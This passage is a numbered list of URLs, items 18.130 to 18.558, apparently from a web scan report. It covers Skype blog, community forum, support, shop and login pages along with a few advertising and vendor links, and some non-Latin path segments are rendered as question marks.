18.130. http://blogs.skype.com/play/

18.131. http://blogs.skype.com/pt/

18.132. http://blogs.skype.com/ru/

18.133. http://blogs.skype.com/security/

18.134. http://blogs.skype.com/zh-Hans/

18.135. http://blogs.skype.com/zh-Hant/

18.136. http://community.skype.com/

18.137. http://community.skype.com/lithium/forum/images/divider-gray-300.jpg

18.138. http://community.skype.com/t5/Accesorios-y-hardware/bd-p/es_hardware

18.139. http://community.skype.com/t5/Allgemeine-Diskussion/bd-p/de_general

18.140. http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

18.141. http://community.skype.com/t5/Ayuda-de-la-comunidad-para-todas/ct-p/es_platforms

18.142. http://community.skype.com/t5/Call-quality/Call-quality-Computer-speed-is-very-slow/m-p/133202

18.143. http://community.skype.com/t5/Call-quality/Cutoffs-after-latest-version-update-Compare-experiences/m-p/134042

18.144. http://community.skype.com/t5/Coffee-Corner/ADD-ME/m-p/134208

18.145. http://community.skype.com/t5/Coffee-Corner/Add-me/m-p/134218

18.146. http://community.skype.com/t5/Coffee-Corner/bd-p/Coffee_corner

18.147. http://community.skype.com/t5/Computer/ct-p/Computer

18.148. http://community.skype.com/t5/Deutsch/ct-p/de

18.149. http://community.skype.com/t5/Discusión-general/bd-p/es_general

18.150. http://community.skype.com/t5/Discussione-generale/bd-p/it_general

18.151. http://community.skype.com/t5/English/ct-p/English

18.152. http://community.skype.com/t5/English/ct-p/English

18.153. http://community.skype.com/t5/Español/ct-p/es

18.154. http://community.skype.com/t5/Facebook/ct-p/fb_en

18.155. http://community.skype.com/t5/Formas-de-pagamento-crédito/bd-p/pt_payment

18.156. http://community.skype.com/t5/Frequently-Asked/ct-p/Frequently_asked

18.157. http://community.skype.com/t5/Garage/Add-an-quot-Old-Emoticons-quot-option-please/m-p/133868

18.158. http://community.skype.com/t5/Garage/bd-p/Garage

18.159. http://community.skype.com/t5/General/ct-p/General_discussion

18.160. http://community.skype.com/t5/Hardware/Speaker-problem/m-p/134244

18.161. http://community.skype.com/t5/Italiano/ct-p/it

18.162. http://community.skype.com/t5/Language-learning/Do-you-want-to-talk-with-me/m-p/134138

18.163. http://community.skype.com/t5/Language-learning/bd-p/Languages

18.164. http://community.skype.com/t5/Le-matériel-Skype/bd-p/fr_hardware

18.165. http://community.skype.com/t5/Les-produits-et-services-Skype/bd-p/fr_products

18.166. http://community.skype.com/t5/Linux/Google-Chrome-OS/m-p/133556

18.167. http://community.skype.com/t5/Linux/bd-p/Linux

18.168. http://community.skype.com/t5/Mac/Multiple-Skype-phone-numbers-how-can-I-forward-calls-to-ONLY-one/m-p/133784

18.169. http://community.skype.com/t5/Mac/OS-X-LION-Skype-5-2-BIIIIIG-PROBLEMS-Be-aware/m-p/134122

18.170. http://community.skype.com/t5/Mac/bd-p/Mac

18.171. http://community.skype.com/t5/Mobile/ct-p/Mobile

18.172. http://community.skype.com/t5/My-Account/ct-p/Account

18.173. http://community.skype.com/t5/Other-devices/GE-31591/m-p/133990

18.174. http://community.skype.com/t5/Other-devices/bd-p/Mobile_other

18.175. http://community.skype.com/t5/Pagamenti-Fatture-Crediti/bd-p/it_payment

18.176. http://community.skype.com/t5/Payments-and-Billing/Account-blocked/m-p/132180

18.177. http://community.skype.com/t5/Payments-and-Billing/bd-p/Payments_and_Billing

18.178. http://community.skype.com/t5/Português/ct-p/pt

18.179. http://community.skype.com/t5/Public-API/Here-are-Workarounds-for-the-Skype4COM-Issues/m-p/133974

18.180. http://community.skype.com/t5/Public-API/bd-p/Public_API

18.181. http://community.skype.com/t5/Págos-Crédito-formas-de-pago/bd-p/es_payment

18.182. http://community.skype.com/t5/Security-Privacy-Trust-and/Account-blocked/m-p/133890

18.183. http://community.skype.com/t5/Security-Privacy-Trust-and/bd-p/Security_and_Privacy

18.184. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/How-to-change-langue/m-p/132756

18.185. http://community.skype.com/t5/Skype-5-3-Beta-for-Mac/bd-p/mac53

18.186. http://community.skype.com/t5/Skype-Community/bd-p/it_community

18.187. http://community.skype.com/t5/Skype-Connect/How-to-logout-from-facebook-account/m-p/133972

18.188. http://community.skype.com/t5/Skype-Connect/bd-p/Skype_Connect

18.189. http://community.skype.com/t5/Skype-Garage/ct-p/Skype_Garage

18.190. http://community.skype.com/t5/Skype-Manager/bd-p/Skype_Manager

18.191. http://community.skype.com/t5/Skype-Manager/deleting-an-older-account/m-p/133288

18.192. http://community.skype.com/t5/Skype-To-Go/Skype-to-Go-Numbers-always-busy/m-p/133620

18.193. http://community.skype.com/t5/Skype-To-Go/bd-p/Skype_To_Go

18.194. http://community.skype.com/t5/Skype-WiFi/Error-Message-quot-Cannot-connect-to-Skype-quot/m-p/132964

18.195. http://community.skype.com/t5/Skype-WiFi/bd-p/Skype_Access

18.196. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

18.197. http://community.skype.com/t5/Skype-for-Business/bd-p/pt_business

18.198. http://community.skype.com/t5/Skype-for-Business/ct-p/Business

18.199. http://community.skype.com/t5/Skype-für-Smartphones/bd-p/de_mobile_smartphones

18.200. http://community.skype.com/t5/Skype-on-your-TV/Need-to-know/m-p/134140

18.201. http://community.skype.com/t5/Skype-on-your-TV/bd-p/Skype_on_your_TV

18.202. http://community.skype.com/t5/Skype-на-комп???е?е/ct-p/ru_community

18.203. http://community.skype.com/t5/Skype-на-мобил?н??-????ой??ва?/ct-p/ru_mobile

18.204. http://community.skype.com/t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/129866

18.205. http://community.skype.com/t5/Subscriptions/Unlimited-world-subscription-not-working/m-p/134220

18.206. http://community.skype.com/t5/Subscriptions/bd-p/Subscriptions

18.207. http://community.skype.com/t5/Suporte-e-Ajuda-entre-a/ct-p/pt_platforms

18.208. http://community.skype.com/t5/Support-et-information/bd-p/fr_community

18.209. http://community.skype.com/t5/Supporto-Skype/bd-p/it_support

18.210. http://community.skype.com/t5/Symbian/bd-p/Symbian

18.211. http://community.skype.com/t5/Symbian/voice-call-nokia-c6/m-p/133740

18.212. http://community.skype.com/t5/Toolbars/My-skype-home-page-does-not-show-a-quot-search-for-users-option/m-p/132922

18.213. http://community.skype.com/t5/Toolbars/bd-p/Toolbars

18.214. http://community.skype.com/t5/Tópicos-Gerais/bd-p/pt_general

18.215. http://community.skype.com/t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24

18.216. http://community.skype.com/t5/Welcome-Getting-Started/bd-p/Welcome

18.217. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

18.218. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242

18.219. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210

18.220. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222

18.221. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/46260

18.222. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/47126

18.223. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/61276

18.224. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

18.225. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

18.226. http://community.skype.com/t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914

18.227. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134202

18.228. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134246

18.229. http://community.skype.com/t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106

18.230. http://community.skype.com/t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300

18.231. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

18.232. http://community.skype.com/t5/Windows/Skype-fails-to-log-me-in/m-p/132356

18.233. http://community.skype.com/t5/Windows/Update-Skype/m-p/132324

18.234. http://community.skype.com/t5/Windows/Windows-Beta-5-5-Suggestion/td-p/26642

18.235. http://community.skype.com/t5/Windows/Windows-Crashes-on-Skype-Startup-Login/m-p/134250

18.236. http://community.skype.com/t5/Windows/bd-p/Windows

18.237. http://community.skype.com/t5/Windows/bd-p/Windows/page/75

18.238. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028

18.239. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true

18.240. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/message-uid/24028/highlight/true

18.241. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032

18.242. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/highlight/true

18.243. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24032/message-uid/24032/highlight/true

18.244. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246

18.245. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/highlight/true

18.246. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740

18.247. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/highlight/true

18.248. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/26740/message-uid/26740/highlight/true

18.249. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/td-p/24028

18.250. http://community.skype.com/t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/130368

18.251. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

18.252. http://community.skype.com/t5/errors/error404page

18.253. http://community.skype.com/t5/forums/forumtopicpage.forummessageviewv2.quickreply.form.form.form

18.254. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24028

18.255. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/24032

18.256. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/25246

18.257. http://community.skype.com/t5/forums/forumtopicpage.kudosbuttonv2.kudoentity:kudoentity/message-uid/26740

18.258. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

18.259. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2922/print-single-message/true/page/1

18.260. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3083/print-single-message/true/page/1

18.261. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/3272/print-single-message/true/page/1

18.262. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message

18.263. http://community.skype.com/t5/forums/searchpage.enableautocomplete:enableautocomplete

18.264. http://community.skype.com/t5/forums/searchpage.searchauthorfilter.form.form

18.265. http://community.skype.com/t5/forums/searchpage.searchcontent.messagesearchcontent.searchform.form.form

18.266. http://community.skype.com/t5/forums/searchpage/tab/message

18.267. http://community.skype.com/t5/forums/searchpage/tab/message

18.268. http://community.skype.com/t5/forums/searchpage/tab/user

18.269. http://community.skype.com/t5/forums/tagdetailpage/tag-cloud-grouping/tag/tag-cloud-style/frequent/message-scope/core-node/category-id/English/user-scope/all/tag-scope/all/timerange/all/tag-visibility-scope/public

18.270. http://community.skype.com/t5/forums/usersonlinepage

18.271. http://community.skype.com/t5/help/faqpage

18.272. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced

18.273. http://community.skype.com/t5/help/faqpage/faq-category-id/blogs

18.274. http://community.skype.com/t5/help/faqpage/faq-category-id/catex

18.275. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas

18.276. http://community.skype.com/t5/help/faqpage/faq-category-id/images

18.277. http://community.skype.com/t5/help/faqpage/faq-category-id/images2

18.278. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos

18.279. http://community.skype.com/t5/help/faqpage/faq-category-id/participation

18.280. http://community.skype.com/t5/help/faqpage/faq-category-id/personalization

18.281. http://community.skype.com/t5/help/faqpage/faq-category-id/pm

18.282. http://community.skype.com/t5/help/faqpage/faq-category-id/posting

18.283. http://community.skype.com/t5/help/faqpage/faq-category-id/qa

18.284. http://community.skype.com/t5/help/faqpage/faq-category-id/registration

18.285. http://community.skype.com/t5/help/faqpage/faq-category-id/search

18.286. http://community.skype.com/t5/help/faqpage/faq-category-id/solutions

18.287. http://community.skype.com/t5/help/faqpage/faq-category-id/tagging

18.288. http://community.skype.com/t5/help/faqpage/faq-category-id/video

18.289. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

18.290. http://community.skype.com/t5/iPhone/bd-p/iPhone

18.291. http://community.skype.com/t5/tag/%20facebook/tg-p/category-id/English

18.292. http://community.skype.com/t5/tag/Android/tg-p/category-id/English

18.293. http://community.skype.com/t5/tag/Skype4COM/tg-p/category-id/English

18.294. http://community.skype.com/t5/tag/Sound/tg-p/category-id/English

18.295. http://community.skype.com/t5/tag/Video/tg-p/category-id/English

18.296. http://community.skype.com/t5/tag/audio/tg-p/category-id/English

18.297. http://community.skype.com/t5/tag/call/tg-p/category-id/English

18.298. http://community.skype.com/t5/tag/contacts/tg-p/category-id/English

18.299. http://community.skype.com/t5/tag/english/tg-p/category-id/English

18.300. http://community.skype.com/t5/tag/error/tg-p/category-id/English

18.301. http://community.skype.com/t5/tag/help/tg-p/category-id/English

18.302. http://community.skype.com/t5/tag/history/tg-p/category-id/English

18.303. http://community.skype.com/t5/tag/language/tg-p/category-id/English

18.304. http://community.skype.com/t5/tag/login/tg-p/category-id/English

18.305. http://community.skype.com/t5/tag/problem/tg-p/category-id/English

18.306. http://community.skype.com/t5/tag/refund/tg-p/category-id/English

18.307. http://community.skype.com/t5/tag/spanish/tg-p/category-id/English

18.308. http://community.skype.com/t5/tag/subscriptions/tg-p/category-id/English

18.309. http://community.skype.com/t5/tag/update/tg-p/category-id/English

18.310. http://community.skype.com/t5/tag/voicemail/tg-p/category-id/English

18.311. http://community.skype.com/t5/user/viewprofilepage/user-id/1164

18.312. http://community.skype.com/t5/user/viewprofilepage/user-id/148

18.313. http://community.skype.com/t5/user/viewprofilepage/user-id/165910

18.314. http://community.skype.com/t5/user/viewprofilepage/user-id/165928

18.315. http://community.skype.com/t5/user/viewprofilepage/user-id/165934

18.316. http://community.skype.com/t5/user/viewprofilepage/user-id/165942

18.317. http://community.skype.com/t5/user/viewprofilepage/user-id/165962

18.318. http://community.skype.com/t5/user/viewprofilepage/user-id/165964

18.319. http://community.skype.com/t5/?кка?н?-и-пла?ежи/ct-p/ru_account

18.320. http://community.skype.com/t5/?ополни?ел?н?й-?аздел/ct-p/ru_general_board

18.321. http://community.skype.com/t5/???/ct-p/jp

18.322. http://fls.doubleclick.net/activityi

18.323. https://fls.doubleclick.net/activityi

18.324. http://googleads.g.doubleclick.net/pagead/ads

18.325. http://googleads.g.doubleclick.net/pagead/ads

18.326. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

18.327. http://h17007.www1.hp.com/us/en/

18.328. http://h18004.www1.hp.com/products/blades/bladesystem/index.html

18.329. http://h20180.www2.hp.com/apps/Nav

18.330. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

18.331. http://h30187.www3.hp.com/

18.332. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm

18.333. http://h30187.www3.hp.com/howto_QL_courses.jsp

18.334. http://h30187.www3.hp.com/index.jsp

18.335. http://h30261.www3.hp.com/phoenix.zhtml

18.336. http://h30434.www3.hp.com/

18.337. http://h30507.www3.hp.com/

18.338. https://h41183.www4.hp.com/inflexion/

18.339. http://heartbeat.skype.com/

18.340. http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html

18.341. https://login.skype.com/account/

18.342. https://login.skype.com/account/login-form

18.343. https://login.skype.com/account/password-automation

18.344. https://login.skype.com/account/password-reset-request

18.345. https://login.skype.com/account/password-token-sent

18.346. https://login.skype.com/account/signup-form

18.347. https://login.skype.com/go/shop

18.348. https://login.skype.com/go/shop.accessories.headsets

18.349. https://login.skype.com/go/shop.accessories.phones

18.350. https://login.skype.com/go/shop.accessories.webcams

18.351. https://login.skype.com/go/shop.extras

18.352. https://login.skype.com/go/skype.manager.setup

18.353. https://login.skype.com/go/tvwebcams

18.354. http://lwn.net/Articles/456878/

18.355. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/wallstreetoasis.com/ROS/1188128263@Right

18.356. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

18.357. http://s1.lqcdn.com/m.min.js

18.358. http://search.hp.com/query.html

18.359. http://shop.skype.com/

18.360. http://shop.skype.com/apps/

18.361. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

18.362. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

18.363. http://shop.skype.com/apps/Business/index.html

18.364. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

18.365. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

18.366. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

18.367. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

18.368. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

18.369. http://shop.skype.com/apps/Call-recording-audio-only/index.html

18.370. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

18.371. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

18.372. http://shop.skype.com/apps/Call-recording-audio-video/index.html

18.373. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

18.374. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

18.375. http://shop.skype.com/apps/Desktop-whiteboard-sharing/index.html

18.376. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

18.377. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

18.378. http://shop.skype.com/apps/Faxing/index.html

18.379. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

18.380. http://shop.skype.com/apps/Integrations-with-popular-software/index.html

18.381. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

18.382. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

18.383. http://shop.skype.com/apps/Mobile-video-communications/index.html

18.384. http://shop.skype.com/apps/Search-Results.html

18.385. http://shop.skype.com/apps/index.html

18.386. http://shop.skype.com/go/shop

18.387. http://shop.skype.com/go/shop.accessories.headsets

18.388. http://shop.skype.com/go/shop.accessories.phones

18.389. http://shop.skype.com/go/shop.accessories.webcams

18.390. http://shop.skype.com/go/shop.extras

18.391. http://shop.skype.com/go/tvwebcams

18.392. http://shop.skype.com/intl/[LC]/

18.393. https://support.skype.com/de/

18.394. https://support.skype.com/en-us/

18.395. https://support.skype.com/en-us/category/ABOUT_SKYPE/

18.396. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

18.397. https://support.skype.com/en-us/category/BANK_TRANSFERS/

18.398. https://support.skype.com/en-us/category/BIZ_VERSION/

18.399. https://support.skype.com/en-us/category/BLACKBERRY/

18.400. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

18.401. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

18.402. https://support.skype.com/en-us/category/CALLING/

18.403. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

18.404. https://support.skype.com/en-us/category/CALL_FORWARDING/

18.405. https://support.skype.com/en-us/category/CALL_QUALITY/

18.406. https://support.skype.com/en-us/category/CALL_TRANSFER/

18.407. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

18.408. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

18.409. https://support.skype.com/en-us/category/CONTACTS/

18.410. https://support.skype.com/en-us/category/CORDLESS_PHONES/

18.411. https://support.skype.com/en-us/category/CREDIT_CARDS/

18.412. https://support.skype.com/en-us/category/EXTRAS/

18.413. https://support.skype.com/en-us/category/FACEBOOK/

18.414. https://support.skype.com/en-us/category/FILE_TRANSFER/

18.415. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

18.416. https://support.skype.com/en-us/category/GIROPAY/

18.417. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

18.418. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

18.419. https://support.skype.com/en-us/category/MONEYBOOKERS/

18.420. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

18.421. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

18.422. https://support.skype.com/en-us/category/PAYMENT_PRICES/

18.423. https://support.skype.com/en-us/category/PAYPAL/

18.424. https://support.skype.com/en-us/category/PAYSAFECARD/

18.425. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

18.426. https://support.skype.com/en-us/category/PREPAID_CARDS/

18.427. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

18.428. https://support.skype.com/en-us/category/PSP/

18.429. https://support.skype.com/en-us/category/PUBLIC_CHATS/

18.430. https://support.skype.com/en-us/category/SCREEN_SHARING/

18.431. https://support.skype.com/en-us/category/SC_CONFIG/

18.432. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

18.433. https://support.skype.com/en-us/category/SC_PBX/

18.434. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

18.435. https://support.skype.com/en-us/category/SC_TROUBLE/

18.436. https://support.skype.com/en-us/category/SEND_MONEY/

18.437. https://support.skype.com/en-us/category/SKYPEFIND/

18.438. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

18.439. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

18.440. https://support.skype.com/en-us/category/SKYPE_ACCESS/

18.441. https://support.skype.com/en-us/category/SKYPE_API/

18.442. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

18.443. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

18.444. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

18.445. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

18.446. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

18.447. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

18.448. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

18.449. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

18.450. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

18.451. https://support.skype.com/en-us/category/SKYPE_LITE/

18.452. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

18.453. https://support.skype.com/en-us/category/SKYPE_ME/

18.454. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

18.455. https://support.skype.com/en-us/category/SKYPE_ON_AU/

18.456. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

18.457. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

18.458. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

18.459. https://support.skype.com/en-us/category/SKYPE_PRIME/

18.460. https://support.skype.com/en-us/category/SKYPE_PRO/

18.461. https://support.skype.com/en-us/category/SKYPE_SMS/

18.462. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

18.463. https://support.skype.com/en-us/category/SKYPE_TO_GO/

18.464. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

18.465. https://support.skype.com/en-us/category/SM_FEATURES/

18.466. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

18.467. https://support.skype.com/en-us/category/SM_MEMBERS/

18.468. https://support.skype.com/en-us/category/SM_PAYMENTS/

18.469. https://support.skype.com/en-us/category/SM_REPORTS/

18.470. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

18.471. https://support.skype.com/en-us/category/TS_ACCOUNT/

18.472. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

18.473. https://support.skype.com/en-us/category/UKASH/

18.474. https://support.skype.com/en-us/category/VIDEO/

18.475. https://support.skype.com/en-us/category/VID_CALLING/

18.476. https://support.skype.com/en-us/category/VOICEMAIL/

18.477. https://support.skype.com/en-us/category/VOUCHERS/

18.478. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

18.479. https://support.skype.com/en-us/category/YANDEX_MONEY/

18.480. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

18.481. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

18.482. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

18.483. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

18.484. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

18.485. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

18.486. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

18.487. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

18.488. https://support.skype.com/en-us/glossary

18.489. https://support.skype.com/en-us/search.form

18.490. https://support.skype.com/en-us/search_first/

18.491. https://support.skype.com/en/

18.492. https://support.skype.com/en/category/BANK_TRANSFERS/

18.493. https://support.skype.com/en/category/BIZ

18.494. https://support.skype.com/en/category/CALL

18.495. https://support.skype.com/en/category/CREDIT_CARDS/

18.496. https://support.skype.com/en/category/GIFT_CERTIFICATES/

18.497. https://support.skype.com/en/category/GIROPAY/

18.498. https://support.skype.com/en/category/MESSAGING

18.499. https://support.skype.com/en/category/MONEYBOOKERS/

18.500. https://support.skype.com/en/category/PAY

18.501. https://support.skype.com/en/category/PAYMENT_PRICES/

18.502. https://support.skype.com/en/category/PAYPAL/

18.503. https://support.skype.com/en/category/PAYSAFECARD/

18.504. https://support.skype.com/en/category/PREPAID_CARDS/

18.505. https://support.skype.com/en/category/PRIVACY__SECURITY/

18.506. https://support.skype.com/en/category/PROD

18.507. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

18.508. https://support.skype.com/en/category/SUBSCRIPTIONS/

18.509. https://support.skype.com/en/category/TECH

18.510. https://support.skype.com/en/category/TS_ACCOUNT/

18.511. https://support.skype.com/en/category/UKASH/

18.512. https://support.skype.com/en/category/VID_CALL

18.513. https://support.skype.com/en/category/VOUCHERS/

18.514. https://support.skype.com/en/category/YANDEX_MONEY/

18.515. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

18.516. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

18.517. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

18.518. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

18.519. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

18.520. https://support.skype.com/en/faqFeedback.form

18.521. https://support.skype.com/en/glossary

18.522. https://support.skype.com/en/search

18.523. https://support.skype.com/en/search.form

18.524. https://support.skype.com/en/support_selection_after_search

18.525. https://support.skype.com/en/tips

18.526. https://support.skype.com/faqView.do

18.527. https://support.skype.com/homepage.do

18.528. https://support.skype.com/search.do

18.529. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php

18.530. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

18.531. http://www.cymphonix.com/2011-shaping-demo-sem.html

18.532. http://www.facebook.com/plugins/fan.php

18.533. http://www.imperva.com/index.html

18.534. http://www.imperva.com/products/wsc_web-application-firewall.html

18.535. http://www.radware.com/

18.536. http://www.radware.com/Resources/AppWallSolution.aspx

18.537. http://www.radware.com/gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw

18.538. http://www.skype.com/favicon.ico

18.539. http://www.skype.com/intl/[LC]/

18.540. http://www.skype.com/intl/_application/content/error_pages/404/

18.541. http://www.skype.com/intl/en-gb/campaigns/toolbar/

18.542. http://www.skype.com/intl/en-gb/legal/privacy/general/

18.543. http://www.skype.com/intl/en-us/business

18.544. http://www.skype.com/intl/en-us/business-user-guide/pc/

18.545. http://www.skype.com/intl/en-us/business/

18.546. http://www.skype.com/intl/en-us/business/download

18.547. http://www.skype.com/intl/en-us/business/download/

18.548. http://www.skype.com/intl/en-us/business/group-video

18.549. http://www.skype.com/intl/en-us/business/group-video/

18.550. http://www.skype.com/intl/en-us/business/skype-connect

18.551. http://www.skype.com/intl/en-us/business/skype-connect/

18.552. http://www.skype.com/intl/en-us/business/skype-manager

18.553. http://www.skype.com/intl/en-us/business/skype-manager/

18.554. http://www.skype.com/intl/en-us/campaigns/gvc/11q1_combined.html

18.555. http://www.skype.com/intl/en-us/features

18.556. http://www.skype.com/intl/en-us/features/

18.557. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding

18.558. http://www.skype.com/intl/en-us/features/allfeatures/call-forwarding/

